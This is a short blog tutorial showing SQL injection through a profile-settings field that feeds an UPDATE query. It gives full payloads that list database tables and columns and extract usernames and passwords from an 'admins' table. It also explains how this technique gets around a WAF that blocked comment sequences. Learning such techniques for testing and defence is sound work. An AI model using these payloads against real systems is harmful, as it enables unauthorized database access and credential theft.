Home 0P3N Blog Tutorial: SQL injection inside UPDATE query
Ready to Start Your Career?
Create Free Account
By: danielkhaoticen
September 15, 2016

Tutorial: SQL injection inside UPDATE query

By: danielkhaoticen
September 15, 2016
By: danielkhaoticen
September 15, 2016
burp-suiteSQL injection inside UPDATE query [Tutorial]This tutorial will help you with SQLi inside UPDATE query.  SQLi is located in profile settings.Picture of settings panel:[caption id="" align="aligncenter" width="217"] click image to enlarge[/caption]Vulnerable parameter is "E-mail format: " value.  We use Temper data to intercept and change values.Picture of intercepted values:After we click "ok" we get this.Picture of MySQL error:
First we wan to find database version,but what would be the easiest way.We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe).Picture of version query:
Picture of rendered content with database answer:
Now that we know how to create our quer lets get tables.Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = 'Picture of get tables query:Picture of rendered content with database answer:Three tables, strange!? Let's check that again. We use count.Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = 'Picture of get tables count query:Picture of rendered content with database answer:
Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers"Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = 'Picture of burp settings:
[caption id="" align="aligncenter" width="320"] click image to enlarge[/caption]
That's all, and now you just get columns the same way with Burp Suite.Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = 'Just increment n with Burp Suite.Values :Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = 'Just increment n with Burp Suite.That's it. Simple, yet effective.  I used this because, waf blocked -- and --+ so I wasn't able to close and comment out query.
I hope you enjoyed this article and look forward to doing more. Let me know what you think in the comments :)
Request Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry